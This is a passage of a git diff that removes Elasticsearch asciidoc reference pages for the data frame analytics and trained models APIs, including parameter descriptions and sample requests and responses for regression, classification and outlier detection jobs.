::: -(object) -A string to string object that contains the default field map to use -when inferring against the model. For example, data frame analytics -may train the model on a specific multi-field `foo.keyword`. -The analytics job would then supply a default field map entry for -`"foo" : "foo.keyword"`. -+ -Any field map described in the inference configuration takes precedence. - -`description`::: -(string) -The free-text description of the trained model. - -`estimated_heap_memory_usage_bytes`::: -(integer) -The estimated heap usage in bytes to keep the trained model in memory. - -`estimated_operations`::: -(integer) -The estimated number of operations to use the trained model. - -`inference_config`::: -(object) -The default configuration for inference. This can be either a `regression` -or `classification` configuration. It must match the underlying -`definition.trained_model`'s `target_type`. -+ -.Properties of `inference_config` -[%collapsible%open] -===== -`classification`:::: -(object) -Classification configuration for inference. -+ -.Properties of classification inference -[%collapsible%open] -====== -`num_top_classes`::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-num-top-classes] - -`num_top_feature_importance_values`::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-num-top-feature-importance-values] - -`prediction_field_type`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-prediction-field-type] - -`results_field`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-results-field] - -`top_classes_results_field`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-top-classes-results-field] -====== -`regression`:::: -(object) -Regression configuration for inference. -+ -.Properties of regression inference -[%collapsible%open] -====== -`num_top_feature_importance_values`::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-regression-num-top-feature-importance-values] - -`results_field`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-results-field] -====== -===== - -`input`::: -(object) -The input field names for the model definition.+ -+ -.Properties of `input` -[%collapsible%open] -===== -`field_names`:::: -(string) -An array of input field names for the model. -===== - -`license_level`::: -(string) -The license level of the trained model. - -`metadata`::: -(object) -An object containing metadata about the trained model. For example, models -created by {dfanalytics} contain `analysis_config` and `input` objects. -+ -.Properties of metadata -[%collapsible%open] -===== -`feature_importance_baseline`::: -(object) -An object that contains the baseline for {feat-imp} values. For {reganalysis}, -it is a single value. For {classanalysis}, there is a value for each class. - -`total_feature_importance`::: -(array) -An array of the total {feat-imp} for each feature used from -the training data set. This array of objects is returned if {dfanalytics} trained -the model and the request includes `total_feature_importance` in the `include` -request parameter. -+ -.Properties of total {feat-imp} -[%collapsible%open] -====== - -`feature_name`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-metadata-feature-importance-feature-name] - -`importance`::: -(object) -A collection of {feat-imp} statistics related to the training data set for this particular feature. -+ -.Properties of {feat-imp} -[%collapsible%open] -======= -`mean_magnitude`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-metadata-feature-importance-magnitude] - -`max`::: -(int) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-metadata-feature-importance-max] - -`min`::: -(int) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-metadata-feature-importance-min] - -======= - -`classes`::: -(array) -If the trained model is a classification model, {feat-imp} statistics are gathered -per target class value. -+ -.Properties of class {feat-imp} -[%collapsible%open] - -======= - -`class_name`::: -(string) -The target class value. Could be a string, boolean, or number. - -`importance`::: -(object) -A collection of {feat-imp} statistics related to the training data set for this particular feature. -+ -.Properties of {feat-imp} -[%collapsible%open] -======== -`mean_magnitude`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-metadata-feature-importance-magnitude] - -`max`::: -(int) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-metadata-feature-importance-max] - -`min`::: -(int) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-metadata-feature-importance-min] - -======== - -======= - -====== -===== - -`model_id`::: -(string) -Idetifier for the trained model. - -`tags`::: -(string) -A comma delimited string of tags. A trained model can have many tags, or none. - -`version`::: -(string) -The {es} version number in which the trained model was created. - -==== - -[[ml-get-trained-models-response-codes]] - -== {api-response-codes-title} - -`400`:: - If `include_model_definition` is `true`, this code indicates that more than - one models match the ID pattern. - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - - -[[ml-get-trained-models-example]] -== {api-examples-title} - -The following example gets configuration information for all the trained models: - -[source,console] --------------------------------------------------- -GET _ml/trained_models/ --------------------------------------------------- -// TEST[skip:TBD] diff --git a/docs/reference/ml/df-analytics/apis/index.asciidoc b/docs/reference/ml/df-analytics/apis/index.asciidoc deleted file mode 100644 index 63a46480ce7..00000000000 --- a/docs/reference/ml/df-analytics/apis/index.asciidoc +++ /dev/null @@ -1,21 +0,0 @@ -include::ml-df-analytics-apis.asciidoc[leveloffset=+1] -//CREATE -include::put-dfanalytics.asciidoc[leveloffset=+2] -include::put-trained-models.asciidoc[leveloffset=+2] -//UPDATE -include::update-dfanalytics.asciidoc[leveloffset=+2] -//DELETE -include::delete-dfanalytics.asciidoc[leveloffset=+2] -include::delete-trained-models.asciidoc[leveloffset=+2] -//EVALUATE -include::evaluate-dfanalytics.asciidoc[leveloffset=+2] -//ESTIMATE_MEMORY_USAGE -include::explain-dfanalytics.asciidoc[leveloffset=+2] -//GET -include::get-dfanalytics.asciidoc[leveloffset=+2] -include::get-dfanalytics-stats.asciidoc[leveloffset=+2] -include::get-trained-models.asciidoc[leveloffset=+2] -include::get-trained-models-stats.asciidoc[leveloffset=+2] -//SET/START/STOP -include::start-dfanalytics.asciidoc[leveloffset=+2] -include::stop-dfanalytics.asciidoc[leveloffset=+2] diff --git a/docs/reference/ml/df-analytics/apis/ml-df-analytics-apis.asciidoc b/docs/reference/ml/df-analytics/apis/ml-df-analytics-apis.asciidoc deleted file mode 100644 index dae8757275e..00000000000 --- a/docs/reference/ml/df-analytics/apis/ml-df-analytics-apis.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-df-analytics-apis]] -= {ml-cap} {dfanalytics} APIs - -You can use the following APIs to perform {ml} {dfanalytics} activities. - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - - -You can use the following APIs to perform {infer} operations. - -* <> -* <> -* <> -* <> - -You can deploy a trained model to make predictions in an ingest pipeline or in -an aggregation. Refer to the following documentation to learn more. - -* <> -* <> - - -See also <>. diff --git a/docs/reference/ml/df-analytics/apis/put-dfanalytics.asciidoc b/docs/reference/ml/df-analytics/apis/put-dfanalytics.asciidoc deleted file mode 100644 index d6fc3fe07b2..00000000000 --- a/docs/reference/ml/df-analytics/apis/put-dfanalytics.asciidoc +++ /dev/null @@ -1,838 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[put-dfanalytics]] -= Create {dfanalytics-jobs} API -[subs="attributes"] -++++ -Create {dfanalytics-jobs} -++++ - -Instantiates a {dfanalytics-job}. - -experimental[] - -[[ml-put-dfanalytics-request]] -== {api-request-title} - -`PUT _ml/data_frame/analytics/` - - -[[ml-put-dfanalytics-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following built-in roles and privileges: - -* `machine_learning_admin` -* source indices: `read`, `view_index_metadata` -* destination index: `read`, `create_index`, `manage` and `index` - -For more information, see <>, <>, and -{ml-docs-setup-privileges}. - - -NOTE: The {dfanalytics-job} remembers which roles the user who created it had at -the time of creation. When you start the job, it performs the analysis using -those same roles. If you provide -<>, -those credentials are used instead. - -[[ml-put-dfanalytics-desc]] -== {api-description-title} - -This API creates a {dfanalytics-job} that performs an analysis on the source -indices and stores the outcome in a destination index. - -If the destination index does not exist, it is created automatically when you -start the job. See <>. - -If you supply only a subset of the {regression} or {classification} parameters, -{ml-docs}/hyperparameters.html[hyperparameter optimization] occurs. It -determines a value for each of the undefined parameters. - -[[ml-put-dfanalytics-path-params]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics-define] - -[role="child_attributes"] -[[ml-put-dfanalytics-request-body]] -== {api-request-body-title} - -`allow_lazy_start`:: -(Optional, Boolean) -Specifies whether this job can start when there is insufficient {ml} node -capacity for it to be immediately assigned to a node. The default is `false`; if -a {ml} node with capacity to run the job cannot immediately be found, the -<> API returns an error. However, this is also subject to the -cluster-wide `xpack.ml.max_lazy_ml_nodes` setting. See <>. -If this option is set to `true`, the API does not return an error and the job -waits in the `starting` state until sufficient {ml} node capacity is available. - -//Begin analysis -`analysis`:: -(Required, object) -The analysis configuration, which contains the information necessary to perform -one of the following types of analysis: {classification}, {oldetection}, or -{regression}. -+ -.Properties of `analysis` -[%collapsible%open] -==== -//Begin classification -`classification`::: -(Required^*^, object) -The configuration information necessary to perform -{ml-docs}/dfa-classification.html[{classification}]. -+ -TIP: Advanced parameters are for fine-tuning {classanalysis}. They are set -automatically by hyperparameter optimization to give the minimum validation -error. It is highly recommended to use the default values unless you fully -understand the function of these parameters. -+ -.Properties of `classification` -[%collapsible%open] -===== -`class_assignment_objective`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=class-assignment-objective] - -`dependent_variable`:::: -(Required, string) -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dependent-variable] -+ -The data type of the field must be numeric (`integer`, `short`, `long`, `byte`), -categorical (`ip` or `keyword`), or boolean. There must be no more than 30 -different values in this field. - -`eta`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=eta] - -`feature_bag_fraction`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=feature-bag-fraction] - -`feature_processors`:::: -(Optional, list) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors] -+ -.Properties of `feature_processors` -[%collapsible%open] -====== -`frequency_encoding`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-frequency] -+ -.Properties of `frequency_encoding` -[%collapsible%open] -======= -`feature_name`:::: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-feat-name] - -`field`:::: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-field] - -`frequency_map`:::: -(Required, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-frequency-map] -======= - -`ngram_encoding`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-ngram] -+ -.Properties of `ngram_encoding` -[%collapsible%open] -======= -`feature_prefix`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-ngram-feat-pref] - -`field`:::: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-ngram-field] - -`length`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-ngram-length] - -`n_grams`:::: -(Required, array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-ngram-ngrams] - -`start`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-ngram-start] -======= - -`one_hot_encoding`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-one-hot] -+ -.Properties of `one_hot_encoding` -[%collapsible%open] -======= -`field`:::: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-field] - -`hot_map`:::: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-one-hot-map] -======= - -`target_mean_encoding`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-target-mean] -+ -.Properties of `target_mean_encoding` -[%collapsible%open] -======= -`default_value`:::: -(Required, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-target-mean-default] - -`feature_name`:::: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-feat-name] - -`field`:::: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-field] - -`target_map`:::: -(Required, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors-target-mean-map] -======= - -====== - -`gamma`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=gamma] - -`lambda`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=lambda] - -`max_trees`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=max-trees] - -`num_top_classes`:::: -(Optional, integer) -Defines the number of categories for which the predicted probabilities are -reported. It must be non-negative or -1. If it is -1 or greater than the total -number of categories, probabilities are reported for all categories; if you have -a large number of categories, there could be a significant effect on the size of your destination index. Defaults to 2. -+ --- -NOTE: To use the -{ml-docs}/ml-dfanalytics-evaluate.html#ml-dfanalytics-class-aucroc[AUC ROC evaluation method], -`num_top_classes` must be set to `-1` or a value greater than or equal to the -total number of categories. - --- - -`num_top_feature_importance_values`:::: -(Optional, integer) -Advanced configuration option. Specifies the maximum number of -{ml-docs}/ml-feature-importance.html[{feat-imp}] values per document to return. -By default, it is zero and no {feat-imp} calculation occurs. - -`prediction_field_name`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=prediction-field-name] - -`randomize_seed`:::: -(Optional, long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=randomize-seed] - -`training_percent`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=training-percent] -//End classification -===== -//Begin outlier_detection -`outlier_detection`::: -(Required^*^, object) -The configuration information necessary to perform -{ml-docs}/dfa-outlier-detection.html[{oldetection}]: -+ -.Properties of `outlier_detection` -[%collapsible%open] -===== -`compute_feature_influence`:::: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=compute-feature-influence] - -`feature_influence_threshold`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=feature-influence-threshold] - -`method`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=method] - -`n_neighbors`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=n-neighbors] - -`outlier_fraction`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=outlier-fraction] - -`standardization_enabled`:::: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=standardization-enabled] -//End outlier_detection -===== -//Begin regression -`regression`::: -(Required^*^, object) -The configuration information necessary to perform -{ml-docs}/dfa-regression.html[{regression}]. -+ -TIP: Advanced parameters are for fine-tuning {reganalysis}. They are set -automatically by hyperparameter optimization to give minimum validation error. -It is highly recommended to use the default values unless you fully understand -the function of these parameters. -+ -.Properties of `regression` -[%collapsible%open] -===== -`dependent_variable`:::: -(Required, string) -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dependent-variable] -+ -The data type of the field must be numeric. - -`eta`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=eta] - -`feature_bag_fraction`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=feature-bag-fraction] - -`feature_processors`:::: -(Optional, list) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-feature-processors] - -`gamma`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=gamma] - -`lambda`:::: -(Optional, double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=lambda] - -`loss_function`:::: -(Optional, string) -The loss function used during {regression}. Available options are `mse` (mean -squared error), `msle` (mean squared logarithmic error), `huber` (Pseudo-Huber -loss). Defaults to `mse`. Refer to -{ml-docs}/dfa-regression.html#dfa-regression-lossfunction[Loss functions for {regression} analyses] -to learn more. - -`loss_function_parameter`:::: -(Optional, double) -A positive number that is used as a parameter to the `loss_function`. - -`max_trees`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=max-trees] - -`num_top_feature_importance_values`:::: -(Optional, integer) -Advanced configuration option. Specifies the maximum number of -{ml-docs}/ml-feature-importance.html[{feat-imp}] values per document to return. -By default, it is zero and no {feat-imp} calculation occurs. - -`prediction_field_name`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=prediction-field-name] - -`randomize_seed`:::: -(Optional, long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=randomize-seed] - -`training_percent`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=training-percent] -===== -//End regression -==== -//End analysis - -//Begin analyzed_fields -`analyzed_fields`:: -(Optional, object) -Specify `includes` and/or `excludes` patterns to select which fields will be -included in the analysis. The patterns specified in `excludes` are applied last, -therefore `excludes` takes precedence. In other words, if the same field is -specified in both `includes` and `excludes`, then the field will not be included -in the analysis. -+ --- -[[dfa-supported-fields]] -The supported fields for each type of analysis are as follows: - -* {oldetection-cap} requires numeric or boolean data to analyze. The algorithms -don't support missing values therefore fields that have data types other than -numeric or boolean are ignored. Documents where included fields contain missing -values, null values, or an array are also ignored. Therefore the `dest` index -may contain documents that don't have an {olscore}. -* {regression-cap} supports fields that are numeric, `boolean`, `text`, -`keyword`, and `ip`. It is also tolerant of missing values. Fields that are -supported are included in the analysis, other fields are ignored. Documents -where included fields contain an array with two or more values are also -ignored. Documents in the `dest` index that don’t contain a results field are -not included in the {reganalysis}. -* {classification-cap} supports fields that are numeric, `boolean`, `text`, -`keyword`, and `ip`. It is also tolerant of missing values. Fields that are -supported are included in the analysis, other fields are ignored. Documents -where included fields contain an array with two or more values are also ignored. -Documents in the `dest` index that don’t contain a results field are not -included in the {classanalysis}. {classanalysis-cap} can be improved by mapping -ordinal variable values to a single number. For example, in case of age ranges, -you can model the values as "0-14" = 0, "15-24" = 1, "25-34" = 2, and so on. - -If `analyzed_fields` is not set, only the relevant fields will be included. For -example, all the numeric fields for {oldetection}. For more information about -field selection, see <>. --- -+ -.Properties of `analyzed_fields` -[%collapsible%open] -==== -`excludes`::: -(Optional, array) -An array of strings that defines the fields that will be excluded from the -analysis. You do not need to add fields with unsupported data types to -`excludes`, these fields are excluded from the analysis automatically. - -`includes`::: -(Optional, array) -An array of strings that defines the fields that will be included in the -analysis. -//End analyzed_fields -==== - -`description`:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=description-dfa] - -`dest`:: -(Required, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dest] - -`max_num_threads`:: -(Optional, integer) -The maximum number of threads to be used by the analysis. -The default value is `1`. Using more threads may decrease the time -necessary to complete the analysis at the cost of using more CPU. -Note that the process may use additional threads for operational -functionality other than the analysis itself. - -`model_memory_limit`:: -(Optional, string) -The approximate maximum amount of memory resources that are permitted for -analytical processing. The default value for {dfanalytics-jobs} is `1gb`. If -your `elasticsearch.yml` file contains an `xpack.ml.max_model_memory_limit` -setting, an error occurs when you try to create {dfanalytics-jobs} that have -`model_memory_limit` values greater than that setting. For more information, see -<>. - -`source`:: -(object) -The configuration of how to source the analysis data. It requires an `index`. -Optionally, `query` and `_source` may be specified. -+ -.Properties of `source` -[%collapsible%open] -==== -`index`::: -(Required, string or array) Index or indices on which to perform the analysis. -It can be a single index or index pattern as well as an array of indices or -patterns. -+ -WARNING: If your source indices contain documents with the same IDs, only the -document that is indexed last appears in the destination index. - -`query`::: -(Optional, object) The {es} query domain-specific language (<>). -This value corresponds to the query object in an {es} search POST body. All the -options that are supported by {es} can be used, as this object is passed -verbatim to {es}. By default, this property has the following value: -`{"match_all": {}}`. - -`_source`::: -(Optional, object) Specify `includes` and/or `excludes` patterns to select which -fields will be present in the destination. Fields that are excluded cannot be -included in the analysis. -+ -.Properties of `_source` -[%collapsible%open] -===== -`includes`:::: -(array) An array of strings that defines the fields that will be included in the -destination. - -`excludes`:::: -(array) An array of strings that defines the fields that will be excluded from -the destination. -===== -==== - - - -[[ml-put-dfanalytics-example]] -== {api-examples-title} - - -[[ml-put-dfanalytics-example-preprocess]] -=== Preprocessing actions example - -The following example shows how to limit the scope of the analysis to certain -fields, specify excluded fields in the destination index, and use a query to -filter your data before analysis. - -[source,console] --------------------------------------------------- -PUT _ml/data_frame/analytics/model-flight-delays-pre -{ - "source": { - "index": [ - "kibana_sample_data_flights" <1> - ], - "query": { <2> - "range": { - "DistanceKilometers": { - "gt": 0 - } - } - }, - "_source": { <3> - "includes": [], - "excludes": [ - "FlightDelay", - "FlightDelayType" - ] - } - }, - "dest": { <4> - "index": "df-flight-delays", - "results_field": "ml-results" - }, - "analysis": { - "regression": { - "dependent_variable": "FlightDelayMin", - "training_percent": 90 - } - }, - "analyzed_fields": { <5> - "includes": [], - "excludes": [ - "FlightNum" - ] - }, - "model_memory_limit": "100mb" -} --------------------------------------------------- -// TEST[skip:setup kibana sample data] - -<1> Source index to analyze. -<2> This query filters out entire documents that will not be present in the -destination index. -<3> The `_source` object defines fields in the dataset that will be included or -excluded in the destination index. -<4> Defines the destination index that contains the results of the analysis and -the fields of the source index specified in the `_source` object. Also defines -the name of the `results_field`. -<5> Specifies fields to be included in or excluded from the analysis. This does -not affect whether the fields will be present in the destination index, only -affects whether they are used in the analysis. - -In this example, we can see that all the fields of the source index are included -in the destination index except `FlightDelay` and `FlightDelayType` because -these are defined as excluded fields by the `excludes` parameter of the -`_source` object. The `FlightNum` field is included in the destination index, -however it is not included in the analysis because it is explicitly specified as -excluded field by the `excludes` parameter of the `analyzed_fields` object. - - -[[ml-put-dfanalytics-example-od]] -=== {oldetection-cap} example - -The following example creates the `loganalytics` {dfanalytics-job}, the analysis -type is `outlier_detection`: - -[source,console] --------------------------------------------------- -PUT _ml/data_frame/analytics/loganalytics -{ - "description": "Outlier detection on log data", - "source": { - "index": "logdata" - }, - "dest": { - "index": "logdata_out" - }, - "analysis": { - "outlier_detection": { - "compute_feature_influence": true, - "outlier_fraction": 0.05, - "standardization_enabled": true - } - } -} --------------------------------------------------- -// TEST[setup:setup_logdata] - - -The API returns the following result: - -[source,console-result] ----- -{ - "id": "loganalytics", - "description": "Outlier detection on log data", - "source": { - "index": ["logdata"], - "query": { - "match_all": {} - } - }, - "dest": { - "index": "logdata_out", - "results_field": "ml" - }, - "analysis": { - "outlier_detection": { - "compute_feature_influence": true, - "outlier_fraction": 0.05, - "standardization_enabled": true - } - }, - "model_memory_limit": "1gb", - "create_time" : 1562265491319, - "version" : "7.6.0", - "allow_lazy_start" : false, - "max_num_threads": 1 -} ----- -// TESTRESPONSE[s/1562265491319/$body.$_path/] -// TESTRESPONSE[s/"version" : "7.6.0"/"version" : $body.version/] - - -[[ml-put-dfanalytics-example-r]] -=== {regression-cap} examples - -The following example creates the `house_price_regression_analysis` -{dfanalytics-job}, the analysis type is `regression`: - -[source,console] --------------------------------------------------- -PUT _ml/data_frame/analytics/house_price_regression_analysis -{ - "source": { - "index": "houses_sold_last_10_yrs" - }, - "dest": { - "index": "house_price_predictions" - }, - "analysis": - { - "regression": { - "dependent_variable": "price" - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - - -The API returns the following result: - -[source,console-result] ----- -{ - "id" : "house_price_regression_analysis", - "source" : { - "index" : [ - "houses_sold_last_10_yrs" - ], - "query" : { - "match_all" : { } - } - }, - "dest" : { - "index" : "house_price_predictions", - "results_field" : "ml" - }, - "analysis" : { - "regression" : { - "dependent_variable" : "price", - "training_percent" : 100 - } - }, - "model_memory_limit" : "1gb", - "create_time" : 1567168659127, - "version" : "8.0.0", - "allow_lazy_start" : false -} ----- -// TESTRESPONSE[s/1567168659127/$body.$_path/] -// TESTRESPONSE[s/"version": "8.0.0"/"version": $body.version/] - - -The following example creates a job and specifies a training percent: - -[source,console] --------------------------------------------------- -PUT _ml/data_frame/analytics/student_performance_mathematics_0.3 -{ - "source": { - "index": "student_performance_mathematics" - }, - "dest": { - "index":"student_performance_mathematics_reg" - }, - "analysis": - { - "regression": { - "dependent_variable": "G3", - "training_percent": 70, <1> - "randomize_seed": 19673948271 <2> - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - -<1> The percentage of the data set that is used for training the model. -<2> The seed that is used to randomly pick which data is used for training. - -The following example uses custom feature processors to transform the -categorical values for `DestWeather` into numerical values using one-hot, -target-mean, and frequency encoding techniques: - -[source,console] --------------------------------------------------- -PUT _ml/data_frame/analytics/flight_prices -{ - "source": { - "index": [ - "kibana_sample_data_flights" - ] - }, - "dest": { - "index": "kibana_sample_flight_prices" - }, - "analysis": { - "regression": { - "dependent_variable": "AvgTicketPrice", - "num_top_feature_importance_values": 2, - "feature_processors": [ - { - "frequency_encoding": { - "field": "DestWeather", - "feature_name": "DestWeather_frequency", - "frequency_map": { - "Rain": 0.14604811155570188, - "Heavy Fog": 0.14604811155570188, - "Thunder & Lightning": 0.14604811155570188, - "Cloudy": 0.14604811155570188, - "Damaging Wind": 0.14604811155570188, - "Hail": 0.14604811155570188, - "Sunny": 0.14604811155570188, - "Clear": 0.14604811155570188 - } - } - }, - { - "target_mean_encoding": { - "field": "DestWeather", - "feature_name": "DestWeather_targetmean", - "target_map": { - "Rain": 626.5588814585794, - "Heavy Fog": 626.5588814585794, - "Thunder & Lightning": 626.5588814585794, - "Hail": 626.5588814585794, - "Damaging Wind": 626.5588814585794, - "Cloudy": 626.5588814585794, - "Clear": 626.5588814585794, - "Sunny": 626.5588814585794 - }, - "default_value": 624.0249512020454 - } - }, - { - "one_hot_encoding": { - "field": "DestWeather", - "hot_map": { - "Rain": "DestWeather_Rain", - "Heavy Fog": "DestWeather_Heavy Fog", - "Thunder & Lightning": "DestWeather_Thunder & Lightning", - "Cloudy": "DestWeather_Cloudy", - "Damaging Wind": "DestWeather_Damaging Wind", - "Hail": "DestWeather_Hail", - "Clear": "DestWeather_Clear", - "Sunny": "DestWeather_Sunny" - } - } - } - ] - } - }, - "analyzed_fields": { - "includes": [ - "AvgTicketPrice", - "Cancelled", - "DestWeather", - "FlightDelayMin", - "DistanceMiles" - ] - }, - "model_memory_limit": "30mb" -} --------------------------------------------------- -// TEST[skip:TBD] - -NOTE: These custom feature processors are optional; automatic -{ml-docs}/ml-feature-encoding.html[feature encoding] still occurs for all -categorical features. - -[[ml-put-dfanalytics-example-c]] -=== {classification-cap} example - -The following example creates the `loan_classification` {dfanalytics-job}, the -analysis type is `classification`: - -[source,console] --------------------------------------------------- -PUT _ml/data_frame/analytics/loan_classification -{ - "source" : { - "index": "loan-applicants" - }, - "dest" : { - "index": "loan-applicants-classified" - }, - "analysis" : { - "classification": { - "dependent_variable": "label", - "training_percent": 75, - "num_top_classes": 2 - } - } -} --------------------------------------------------- -// TEST[skip:TBD] diff --git a/docs/reference/ml/df-analytics/apis/put-trained-models.asciidoc b/docs/reference/ml/df-analytics/apis/put-trained-models.asciidoc deleted file mode 100644 index ecf0537d242..00000000000 --- a/docs/reference/ml/df-analytics/apis/put-trained-models.asciidoc +++ /dev/null @@ -1,664 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[put-trained-models]] -= Create trained models API -[subs="attributes"] -++++ -Create trained models -++++ - -Creates a trained model. - -WARNING: Models created in version 7.8.0 are not backwards compatible - with older node versions. If in a mixed cluster environment, - all nodes must be at least 7.8.0 to use a model stored by - a 7.8.0 node. - - -experimental[] - - -[[ml-put-trained-models-request]] -== {api-request-title} - -`PUT _ml/trained_models/` - - -[[ml-put-trained-models-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following -built-in roles or equivalent privileges: - -* `machine_learning_admin` - -For more information, see <> and {ml-docs-setup-privileges}. - - -[[ml-put-trained-models-desc]] -== {api-description-title} - -The create trained model API enables you to supply a trained model that is not -created by {dfanalytics}. - - -[[ml-put-trained-models-path-params]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-id] - -[role="child_attributes"] -[[ml-put-trained-models-request-body]] -== {api-request-body-title} - -`compressed_definition`:: -(Required, string) -The compressed (GZipped and Base64 encoded) {infer} definition of the model. -If `compressed_definition` is specified, then `definition` cannot be specified. - -//Begin definition -`definition`:: -(Required, object) -The {infer} definition for the model. If `definition` is specified, then -`compressed_definition` cannot be specified. -+ -.Properties of `definition` -[%collapsible%open] -==== -//Begin preprocessors -`preprocessors`:: -(Optional, object) -Collection of preprocessors. See <>. -+ -.Properties of `preprocessors` -[%collapsible%open] -===== -//Begin frequency encoding -`frequency_encoding`:: -(Required, object) -Defines a frequency encoding for a field. -+ -.Properties of `frequency_encoding` -[%collapsible%open] -====== -`feature_name`:: -(Required, string) -The name of the resulting feature. - -`field`:: -(Required, string) -The field name to encode. - -`frequency_map`:: -(Required, object map of string:double) -Object that maps the field value to the frequency encoded value. - -`custom`:: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-preprocessor] - -====== -//End frequency encoding - -//Begin one hot encoding -`one_hot_encoding`:: -(Required, object) -Defines a one hot encoding map for a field. -+ -.Properties of `one_hot_encoding` -[%collapsible%open] -====== -`field`:: -(Required, string) -The field name to encode. - -`hot_map`:: -(Required, object map of strings) -String map of "field_value: one_hot_column_name". - -`custom`:: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-preprocessor] - -====== -//End one hot encoding - -//Begin target mean encoding -`target_mean_encoding`:: -(Required, object) -Defines a target mean encoding for a field. -+ -.Properties of `target_mean_encoding` -[%collapsible%open] -====== -`default_value`::: -(Required, double) -The feature value if the field value is not in the `target_map`. - -`feature_name`::: -(Required, string) -The name of the resulting feature. - 